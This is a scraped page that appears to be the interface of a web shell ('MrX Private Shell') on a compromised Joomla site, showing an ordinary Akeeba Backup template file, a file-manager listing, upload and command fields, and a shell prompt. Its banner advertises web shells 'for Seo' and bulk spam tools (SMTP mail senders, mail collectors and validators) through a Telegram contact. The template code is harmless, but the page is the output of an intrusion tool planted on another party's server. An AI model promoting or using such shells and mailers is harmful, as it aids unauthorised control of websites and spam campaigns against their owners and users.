__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * @package   akeebabackup
 * @copyright Copyright (c)2006-2024 Nicholas K. Dionysopoulos / Akeeba Ltd
 * @license   GNU General Public License version 3, or later
 */

defined('_JEXEC') || die;

use Joomla\CMS\HTML\HTMLHelper as HTMLHelperAlias;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Router\Route;
use Joomla\CMS\Uri\Uri;

/** @var  \Akeeba\Component\AkeebaBackup\Administrator\View\Alice\HtmlView $this */

$js = <<< JS
document.addEventListener('DOMContentLoaded', function() {
    setTimeout(function () {
		document.forms.adminForm.submit();        
    }, 500);
});
JS;

$this->document->getWebAssetManager()
	->useScript('com_akeebabackup.system')
	->addInlineScript($js, [], [], [
			'com_akeebabackup.system'
	]);

?>

<div class="card">
	<h3 class="card-header">
		<?= Text::_('COM_AKEEBABACKUP_ALICE_ANALYZE_LABEL_PROGRESS') ?>
	</h3>
	<div class="card-body">
		<h4>
			<?= $this->currentSection ?>
		</h4>
		<p>
			<?= $this->currentCheck ?>
		</p>
		<div class="progress">
			<div class="progress-bar" role="progressbar" style="width: <?= $this->percentage ?>%;"
				 aria-valuenow="<?= $this->percentage ?>" aria-valuemin="0" aria-valuemax="100"
			><?= $this->percentage ?>%</div>
		</div>
		<p class="text-center my-5">
			<img src="<?= Uri::root() ?>/media/com_akeebabackup/icons/spinner.gif"
				 alt="<?= Text::_('COM_AKEEBABACKUP_ALICE_ANALYZE_LABEL_PROGRESS') ?>" />
		</p>
	</div>
</div>

<form name="adminForm" id="adminForm"
	  action="<?= Route::_('index.php?option=com_akeebabackup&task=Alice.step') ?>" method="post">
	<?= HTMLHelperAlias::_('form.token') ?>
</form>

Filemanager

Name Type Size Permission Actions
default.php File 1.81 KB 0664
error.php File 984 B 0664
result.php File 2.4 KB 0664
step.php File 1.57 KB 0664
Filemanager